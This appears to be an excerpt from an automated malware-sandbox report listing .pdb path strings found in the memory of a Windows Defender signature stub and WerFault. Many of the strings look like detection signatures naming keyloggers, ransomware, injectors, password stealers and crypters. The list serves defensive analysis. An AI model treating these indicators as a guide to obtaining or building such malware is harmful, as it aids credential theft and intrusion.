Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp
Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918468716.00000000030C6000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000009.00000003.2920056243.00000000030D7000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb* source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: sxs.pdbj source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000005.00000003.2855994969.00000000029B0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2919220866.00000000030BB000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.2856883159.00000000029A5000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962000837.00000000051D0000.00000004.00000040.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb( source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2927187876.000000000617A000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.2859676804.00000000054EC000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2922725864.0000000006136000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp
Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
